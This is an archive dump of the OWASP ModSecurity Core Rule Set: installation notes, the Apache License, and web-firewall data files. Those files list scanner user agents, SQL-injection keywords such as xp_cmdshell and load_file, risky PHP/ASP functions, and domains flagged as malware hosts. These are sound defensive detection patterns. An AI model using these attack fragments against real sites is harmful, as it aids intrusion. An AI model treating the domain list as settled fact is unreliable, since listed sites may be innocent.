/usr/local/apache/conf/crs/base_rules/modsecurity_crs_14_customrules.conf lrwxr-xr-x 1 root wheel 57 May 17 14:22 modsecurity_crs_10_setup.conf -> /usr/local/apache/conf/crs/modsecurity_crs_10_setup.conf lrwxr-xr-x 1 root wheel 81 May 17 14:01 modsecurity_crs_20_protocol_violations.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_20_protocol_violations.conf lrwxr-xr-x 1 root wheel 80 May 17 14:01 modsecurity_crs_21_protocol_anomalies.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_21_protocol_anomalies.conf lrwxr-xr-x 1 root wheel 76 May 17 14:01 modsecurity_crs_23_request_limits.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_23_request_limits.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_30_http_policy.conf -> 
/usr/local/apache/conf/crs/base_rules/modsecurity_crs_30_http_policy.conf lrwxr-xr-x 1 root wheel 72 May 17 14:01 modsecurity_crs_35_bad_robots.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_35_bad_robots.conf lrwxr-xr-x 1 root wheel 77 May 17 14:01 modsecurity_crs_40_generic_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_40_generic_attacks.conf lrwxr-xr-x 1 root wheel 83 May 17 14:01 modsecurity_crs_41_sql_injection_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_41_sql_injection_attacks.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_41_xss_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_41_xss_attacks.conf lrwxr-xr-x 1 root wheel 78 May 17 14:14 modsecurity_crs_42_comment_spam.conf -> /usr/local/apache/conf/crs/optional_rules/modsecurity_crs_42_comment_spam.conf lrwxr-xr-x 1 root wheel 76 May 17 14:01 modsecurity_crs_42_tight_security.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_42_tight_security.conf lrwxr-xr-x 1 root wheel 69 May 17 14:01 modsecurity_crs_45_trojans.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_45_trojans.conf lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_crs_47_common_exceptions.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_47_common_exceptions.conf lrwxr-xr-x 1 root wheel 86 May 17 14:01 modsecurity_crs_48_local_exceptions.conf.example -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_48_local_exceptions.conf.example lrwxr-xr-x 1 root wheel 78 May 17 14:01 modsecurity_crs_49_inbound_blocking.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_49_inbound_blocking.conf lrwxr-xr-x 1 root wheel 70 May 17 14:01 modsecurity_crs_50_outbound.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_50_outbound.conf lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_crs_59_outbound_blocking.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_59_outbound_blocking.conf 
lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_60_correlation.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_60_correlation.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_60_customrules.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_60_customrules.conf 3) Add the following line to your httpd.conf (assuming you've placed the rule files into conf/crs/): Include conf/crs/modsecurity_crs_10_setup.conf Include conf/crs/activated_rules/*.conf 3) Restart web server. 4) Make sure your web sites are still running fine. 5) Simulate an attack against the web server. Then check the attack was correctly logged in the Apache error log, ModSecurity debug log (if you enabled it) and ModSecurity audit log (if you enabled it). SpiderLabs-owasp-modsecurity-crs-0f07cbb/LICENSE000066400000000000000000000261351216457256400215400ustar00rootroot00000000000000 Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. 
"Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." 
"Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. 
You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. 
Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. 
In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. 
Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. SpiderLabs-owasp-modsecurity-crs-0f07cbb/README.md000066400000000000000000000027151216457256400220100ustar00rootroot00000000000000# OWASP ModSecurity Core Rule Set (CRS) ModSecurity™ is a web application firewall engine that provides very little protection on its own. In order to become useful, ModSecurity™ must be configured with rules. In order to enable users to take full advantage of ModSecurity™ out of the box, Trustwave's SpiderLabs is sponsoring and maintaining a free certified rule set for the community. Unlike intrusion detection and prevention systems, which rely on signatures specific to known vulnerabilities, the OWASP ModSecurity Core Rule Set provides generic protection from unknown vulnerabilities often found in web applications, which are in most cases custom coded. The Core Rules are heavily commented to allow them to be used as a step-by-step deployment guide for ModSecurity™. 
## Licensing (c) 2006-2012 Trustwave The ModSecurity Core Rule Set is provided to you under the terms and conditions of Apache Software License Version 2 (ASLv2) http://www.apache.org/licenses/LICENSE-2.0.txt ## Mail-List For more information refer to the OWASP Core Rule Set Project page at http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project Core Rules Mail-list - Subscribe here: https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-core-rule-set Archive: https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/ ## Downloading You can manually download the latest CRS from the GitHub Repo: https://github.com/SpiderLabs/owasp-modsecurity-crs SpiderLabs-owasp-modsecurity-crs-0f07cbb/activated_rules/000077500000000000000000000000001216457256400237025ustar00rootroot00000000000000SpiderLabs-owasp-modsecurity-crs-0f07cbb/activated_rules/README000066400000000000000000000131301216457256400245600ustar00rootroot00000000000000 Enable the CRS rules files you want to use by creating symlinks under the "activated_rules" directory location. You will want to create symlinks for the following: 1) The main modsecurity_crs_10_setup.conf file 2) Any rules from the base_rules directory 3) Any remaining rules from the optional_rules, slr_rules or experimental_rules directories. 
$ pwd /usr/local/apache/conf/crs $ ls CHANGELOG app_sensor modsecurity_crs_10_setup.conf slr_rules LICENSE base_rules modsecurity_crs_10_setup.conf.example util README experimental_rules modsecurity_crs_15_customrules.conf activated_rules lua optional_rules $ sudo ln -s /usr/local/apache/conf/crs/modsecurity_crs_10_setup.conf activated_rules/modsecurity_crs_10_setup.conf $ for f in `ls base_rules/` ; do sudo ln -s /usr/local/apache/conf/crs/base_rules/$f activated_rules/$f ; done $ for f in `ls optional_rules/ | grep comment_spam` ; do sudo ln -s /usr/local/apache/conf/crs/optional_rules/$f activated_rules/$f ; done $ ls -l activated_rules total 216 lrwxr-xr-x 1 root wheel 52 May 17 14:01 GsbMalware.dat -> /usr/local/apache/conf/crs/base_rules/GsbMalware.dat lrwxr-xr-x 1 root wheel 68 May 17 14:01 modsecurity_35_bad_robots.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_35_bad_robots.data lrwxr-xr-x 1 root wheel 66 May 17 14:01 modsecurity_35_scanners.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_35_scanners.data lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_40_generic_attacks.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_40_generic_attacks.data lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_41_sql_injection_attacks.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_41_sql_injection_attacks.data lrwxr-xr-x 1 root wheel 74 May 17 14:14 modsecurity_42_comment_spam.data -> /usr/local/apache/conf/crs/optional_rules/modsecurity_42_comment_spam.data lrwxr-xr-x 1 root wheel 66 May 17 14:01 modsecurity_50_outbound.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_50_outbound.data lrwxr-xr-x 1 root wheel 74 May 17 14:01 modsecurity_50_outbound_malware.data -> /usr/local/apache/conf/crs/base_rules/modsecurity_50_outbound_malware.data lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_14_customrules.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_14_customrules.conf lrwxr-xr-x 1 root wheel 57 May 
17 14:22 modsecurity_crs_10_setup.conf -> /usr/local/apache/conf/crs/modsecurity_crs_10_setup.conf lrwxr-xr-x 1 root wheel 81 May 17 14:01 modsecurity_crs_20_protocol_violations.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_20_protocol_violations.conf lrwxr-xr-x 1 root wheel 80 May 17 14:01 modsecurity_crs_21_protocol_anomalies.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_21_protocol_anomalies.conf lrwxr-xr-x 1 root wheel 76 May 17 14:01 modsecurity_crs_23_request_limits.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_23_request_limits.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_30_http_policy.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_30_http_policy.conf lrwxr-xr-x 1 root wheel 72 May 17 14:01 modsecurity_crs_35_bad_robots.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_35_bad_robots.conf lrwxr-xr-x 1 root wheel 77 May 17 14:01 modsecurity_crs_40_generic_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_40_generic_attacks.conf lrwxr-xr-x 1 root wheel 83 May 17 14:01 modsecurity_crs_41_sql_injection_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_41_sql_injection_attacks.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_41_xss_attacks.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_41_xss_attacks.conf lrwxr-xr-x 1 root wheel 78 May 17 14:14 modsecurity_crs_42_comment_spam.conf -> /usr/local/apache/conf/crs/optional_rules/modsecurity_crs_42_comment_spam.conf lrwxr-xr-x 1 root wheel 76 May 17 14:01 modsecurity_crs_42_tight_security.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_42_tight_security.conf lrwxr-xr-x 1 root wheel 69 May 17 14:01 modsecurity_crs_45_trojans.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_45_trojans.conf lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_crs_47_common_exceptions.conf -> 
/usr/local/apache/conf/crs/base_rules/modsecurity_crs_47_common_exceptions.conf lrwxr-xr-x 1 root wheel 86 May 17 14:01 modsecurity_crs_48_local_exceptions.conf.example -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_48_local_exceptions.conf.example lrwxr-xr-x 1 root wheel 78 May 17 14:01 modsecurity_crs_49_inbound_blocking.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_49_inbound_blocking.conf lrwxr-xr-x 1 root wheel 70 May 17 14:01 modsecurity_crs_50_outbound.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_50_outbound.conf lrwxr-xr-x 1 root wheel 79 May 17 14:01 modsecurity_crs_59_outbound_blocking.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_59_outbound_blocking.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_60_correlation.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_60_correlation.conf lrwxr-xr-x 1 root wheel 73 May 17 14:01 modsecurity_crs_60_customrules.conf -> /usr/local/apache/conf/crs/base_rules/modsecurity_crs_60_customrules.conf SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/000077500000000000000000000000001216457256400226505ustar00rootroot00000000000000SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_35_bad_robots.data000066400000000000000000000036571216457256400305720ustar00rootroot00000000000000webmole wisenutbot prowebwalker hanzoweb email toata dragostea mea pentru diavola gameBoy, powered by nintendo missigua poe-component-client emailsiphon adsarobot under the rainbow 2. 
nessus floodgate email extractor webaltbot contactbot/ butch__2.1.1 pe 1.4 indy library autoemailspider mozilla/3.mozilla/2.01 fantombrowser digout4uagent panscient.com telesoft ; widows converacrawler www.weblogs.com murzillo compatible isc systems irc search 2.1 emailmagnet microsoft url control datacha0s emailwolf production bot sitesnagger webbandit web by mail faxobot grub crawler jakarta eirgrabber webemailextrac extractorpro attache educate search vxb 8484 boston project franklin locator nokia-waptoolkit mailto:craftbot@yahoo.com full web bot pcbrowser psurf user-Agent pleasecrawl/1. kenjin spider gecko/25 no browser webster pro wep Search 00 grub-client fastlwspider this is an exploit contentsmartz teleport pro dts agent nikto morzilla via atomic_email_hunter program shareware 1.0. ecollector emailcollect china local browse 2. backdoor stress test foobar/ emailreaper xmlrpc exploit compatible ; msie s.t.a.l.k.e.r. compatible- webvulnscan nameofagent copyrightcheck advanced email extractor surveybot compatible ;. 
searchbot admin@google wordpress/4.01 webemailextract larbin@unspecified turing machine zeus windows-update-agent morfeus fucking scanner user-agent: voideye mosiac 1 chinaclaw newt activeX; win32 web downloader safexplorer tl agdm79@mail.ru cheesebot hhjhj@yahoo fiddler psycheclone microsoft internet explorer/5.0 core-project/1 atspider copyguard neuralbot/0.2 wordpress hash grabber amiga-aweb/3.4 packrat rsync crescent internet toolpak security scan vadixbot concealed defense a href= bwh3_user_agent internet ninja microsoft url emailharvest shai wisebot internet exploiter sux wells search ii webroot digimarc webreader botversion black hole w3mir pmafind athens hl_ftien_spider injection takeout eo browse cherrypicker internet-exprorer SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_35_scanners.data000066400000000000000000000006021216457256400302530ustar00rootroot00000000000000grabber cgichk bsqlbf mozilla/4.0 (compatible) sqlmap mozilla/4.0 (compatible; msie 6.0; win32) mozilla/5.0 sf// nessus arachni metis sql power injector bilbo absinthe black widow n-stealth brutus webtrends security analyzer netsparker python-httplib2 jaascois pmafind .nasl nsauditor paros dirbuster pangolin nmap nse sqlninja nikto webinspect blackwidow grendel-scan havij w3af hydra SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_40_generic_attacks.data000066400000000000000000000075301216457256400315700ustar00rootroot00000000000000set-cookie .cookie expiressys.user_objects sys.user_triggers @@spid msysaces instr sys.user_views mysql. 
sys.tab charindex locate sys.user_catalog constraint_type msysobjects attnotnull select sys.user_tables sys.user_constraints sys.user_tab_columns waitfor sys.all_tables msysrelationships msyscolumns msysqueriessubstr xtype textpos all_objects rownum sysfilegroups sysprocesses user_group sysobjects systables user_tables pg_attribute column_id user_password user_users attrelid user_tab_columns table_name pg_class user_constraints user_objects object_type sysconstraints mb_users column_name atttypid substring object_id syscat sysibm user_ind_columns syscolumns sysdba object_name sqrt insert date instr floor autonomous_transaction print encode coalesce if degrees release_lock procedure_analyse password least cr32 subdate xp_filelist owa_util trim xp_regenumkeys charset ciel bit_or delete time month xp_execresultset round dba_users is master_pos_wait decode unhex char_length strcmp rtrim 'sa' version ord xp_makecab truncate last concat coercibility right length ascii var_samp char extract get_ bit_length xp_regread export_set aes_decrypt name_const left conv bin not_in infile substr uuid is_srvrolemember var_pop ln aes_encrypt outfile current_date quote in user locate @@version exp current_timestamp sql_longvarchar values subtime xp_loginconfig sin xp_regaddmultistring replace tan xmltype character_length cast current_time varchar position to_number addtime mid found_rows stddev xp_availablemedia substring dumpfile isnull cot select concat_ws convert uncompress radians uncompressed_length acos 'sqloledb' dbms_pipe.receive_message utl_http cieling row_count benchmark sec_to_time sysdate hour current_user utc_ curdate nvarchar schema data_type lcase inner make_set day tbcreator sum sign adddate ltrim variance weight_string second microsecond system_user abs ifnull minute unix_timestamp collation curtime lower repeat sp_oacreate group_concat sp_execute xp_ntsec xp_regdeletekey drop quarter local str_to_date nullif from_ old_password xp_regdeletevalue asin oct load_file 
sp_password bit_xor xp_regremovemultistring chr avg std openquery makedate database updatexml datediff now year mod bit_and lpad xp_enumdsn max period_ soundex shutdown bit_count field connection_id sha default interval xp_dirtree reverse ucase compress xp_terminate_process md5 rpad session_user find_in_set dump convert_tz having des_ greatest xp_regenumvalues utl_file cos log pi sql_variant encrypt upper rand week min xp_cmdshell 'msdasql' space sp_executesql elt pow 'dbo' sp_makewebtask dbms_java to_ format xp_regwrite sp_helpjscript onsubmit copyparentfolder document javascript meta onchange onmove onkeydown onkeyup activexobject onerror onmouseup ecmascript bexpression onmouseover vbscript: Index of >
Index ofMicrosoft VBScript runtime (0x8 error '800 Application uses a value of the wrong type for the current operation Microsoft VBScript compilation (0x8 Microsoft VBScript compilation error Microsoft .NET Framework Version: A trappable error occurred in an external object. The script cannot continue running rror Microsoft VBScript runtime Error >Syntax error in string in query expression ADODB.Command Object required: ' <b>Version Information:</b> does not match with a table name or alias name used in the query You have an error in your SQL syntax near ' Wora_ Wpg_ select list because it is not contained in either an aggregate function or the GROUP BY clause Syntax error converting the supplied argument is not a valid MS SQL supplied argument is not a valid Oracle Unclosed quotation mark before the character string Warning: mysql_connect(): Unable to connect to PostgreSQL server: SQL Server does not exist or access denied supplied argument is not a valid PostgreSQL result Microsoft OLE DB Provider for Access Database Engine Either BOF or EOF is True, or the current record has been deleted supplied argument is not a valid ODBC supplied argument is not a valid MySQL WRoadhouse You have an error in your SQL syntax error '800a01b8' data type as an argument. SQL syntax select list because it is not contained in an aggregate function and there is no GROUP BY clause ' in sysservers. 
execute sp_addlinkedserver incorrect syntax near These statistics were produced by PeLAB This analysis was produced by These statistics were produced by getstats This report was generated by WebLog ebalizer This summary was generated byfgets ftp_put ftp_nb_put fopen readdir $_post ftp_nb_fput ftp_get scandir readgzfile proc_open ftp_fput fwrite session_start gzopen $_session move_uploaded_file readfile ftp_fget gzencode bzopen gzread call_user_func ftp_nb_fget $_get fscanf fread fgetc ftp_nb_get fgetss gzwrite gzcompressserver.urlencode server.createobject scripting.filesystemobject server.execute wscript.shell <jsp: .createtextfile .addheader wscript.network javax.servlet .loadfromfile server.mappath vbscript.encode server.htmlencode response.write response.binarywrite .getfile ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_50_outbound_malware.data������������0000664�0000000�0000000�00000156612�12164572564�0032020�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������0041099.netsolhost.com/ 00x00.freehostia.com/ 0wnzz.by.ru/ 0xg3458.hub.io/ 109.cypanel.com/ 10thplanet.com/ 115.137.197.60/ 118.216.255.31/ 123.143.98.5/ 123.242.165.138/ 125.163.251.219/ 129.241.91.11/ 129.252.3.27/ 140.116.41.10/ 140.127.22.184/ 140.174.95.72/ 144.206.186.112/ 161.58.102.135/ 163.17.8.18/ 163.26.12.232/ 163.30.34.175/ 189.26.202.84/ 
193.126.17.38/ 193.178.146.9/ 193.255.208.32/ 193.92.8.6/ 200.113.126.76/ 200.137.78.13/ 2006.aninite.at/ 2008.itcweb.co.uk/ 201.134.249.164/ 201.16.248.189/ 201.218.228.82/ 202.29.15.17/ 202.91.74.136/ 203.114.112.155/ 203.128.246.107/ 203.210.98.218/ 204.2.183.2/ 206.126.97.21/ 208.57.132.68/ 208.98.22.220/ 208.98.22.241/ 209.222.32.86/ 210.110.97.14/ 210.143.111.146/ 210.240.82.130/ 211.179.234.210/ 211.245.23.155/ 212.227.74.68/ 212.81.134.34/ 212.81.134.35/ 217.20.172.129/ 217.218.225.2/ 220.130.180.180/ 220.134.244.157/ 3sk3nt.kit.net/ 51ucn.com/ 59.120.216.117/ 5euroshirts.com/ 60kmovistar.com/ 62.81.136.90/ 62.94.24.124/ 63.247.71.7/ 63chan.org/ 64.13.230.27/ 64.15.67.17/ 64.32.13.133/ 65.247.182.200/ 66.7.56.125/ 67.15.84.42/ 67.15.84.68/ 67.222.48.109/ 69amigas.com/ 6l0zt.com/ 71.39.154.29/ 72.51.35.246/ 72.9.152.46/ 72.9.157.204/ 74.208.173.138/ 74.208.47.58/ 74.208.97.167/ 74.54.28.74/ 77.74.195.211/ 80.24.176.145/ 80.53.180.196/ 80.93.216.229/ 82.146.51.16/ 82.237.10.37/ 82.239.220.185/ 83.3.132.70/ 85.17.141.101/ 87.117.231.182/ 88.220.140.100/ 88.79.125.58/ 89.171.87.228/ 89.28.13.202/ 90plan.ovh.net/ 94.125.181.5/ aaa22.altervista.org/ aaa2.altervista.org/ aaaa2.altervista.org/ aaaaaaaa2.altervista.org/ aalesundby.no/ aardvarkracing.co.uk/ abaaa.altervista.org/ abaa.altervista.org/ abbath.altervista.org/ abcabc.fileave.com/ abdullah.pp.ru/ abiona.de/ abirdseyeviewof.com/ aboutav.com/ about-dogs.info/ aboutgolfclubs.com/ about-philosophy.ru/ abprogramlari.trakya.edu.tr/ acerbix.altervista.org/ aciel.biz.ly/ actifit.co.kr/ activauto.fr/ .adaiwa.com/ admin.bestcominfo.com/ admins.onceinalifespan.com/ adresik.info/ adweb.com.ua/ aene.de/ aertravel2.com/ aflamsat.com/ aglifestylesmarketplace.com/ ahhmulekrox.xpg.com.br/ aiags.com/ aiplaw.com/ ajudapovos.web6.f3.k8.com.br/ akcommunity.fileave.com/ akisalira.t35.com/ aladin-online.com/ alandar.net/ aldeanos.com/ aldeiadapaz.org.br/ alfabanksemarang.com/ allnet2.fileave.com/ almeriadefensaanimal.org/ 
.altervista.org/ alwaysdollar.com/ amadeus-umzuege.de/ amboy.do.am/ amboy-x.ucoz.ae/ ambrosiasociety.org/ amcara.com/ amigospv.com/ amixblack.110mb.com/ amyru.h18.ru/ anakdompu.by.ru/ anakdompu.pastebin.com/ anansi.pl/ anaquatico.com/ andii.fileave.com/ anggey.selfip.com/ anirank.com/ annualkellyfamilyreunion.com/ anonimo234.interfree.it/ anthony-campbell.com/ anuncios.pisosinmobiliarios.es/ aokgroup.co.uk/ arclips.com/ arcwebdev.net/ arda.or.th/ arhyoufpt1.ns10-wistee.fr/ armadaglass.webrok.co.uk/ armedassault-turkiye.net/ arnika-tour.ru/ arsenal-music.ru/ artbernard.ru/ arteestetica.org/ artimagebazar.net/ asbak1.fileave.com/ asdasdasd.fileave.com/ asdz.altervista.org/ ashaclub.com/ asia-leap.com/ asoka.nl/ assess.vet.cmu.ac.th/ assishop.com/ asslam-pk.com/ astana-auto.kz/ astel-oscora.com/ atrason.com/ ats-usa.net/ attacker.com/ aukce.hoggos.cz/ aukce.strojnet.com/ autobestwestern.cn/ automotrizozcar.com/ axioma-dch.com/ b0.i8.com/ baaaaaa.altervista.org/ babycaleb.axspace.com/ babycaleb.fortunecity.co.uk/ babycaleb.mvhosted.com/ backconnect.freehost10.com/ backup.nscf-n.or.kr/ badmintonblog.net/ badwolfmx3.wghost.tv/ baliimports.com.au/ ballermarketing.com/ bamrecordsinc.com/ bangalore.ddhanbit.or.kr/ bangkokchurch.com/ bangsat6.fileave.com/ barfod.no/ basic-it.de/ bastel-gianni.ch/ baumann-oliver.de/ bbia.go.id/ beautyengg.com/ bebe.abril.com.br/ bebe.com.br/ beencn.cn/ belasarteshotel.com.br/ benadams.agilityhoster.com/ bergeteufel.de/ bestfindaloan.cn/ besthandycap.com/ bestlotron.cn/ beta.kdd-online.com/ betbigwager.cn/ bghk.net/ biadabz.co.uk/ bibdigital.epn.edu.ec/ bidbpersonel.trakya.edu.tr/ biig.com/ bikelove.hostinginfive.com/ bikerstammtisch.biz/ bildpunktlinden.de/ billiardshow.de/ billing.crazyhostguy.com/ bimbam.dk/ bimonet.zat.su/ biquad.com.br/ bizadmin.hongik.ac.kr/ bjork.name.md/ bl4ckb0t.biz/ blackincoming.freehostia.com/ blacknite.eu/ blankewaffen.de/ blendcolours.com/ blezeer.com/ blissbeads.ca/ blixweb.no/ blog.3s.com.ua/ 
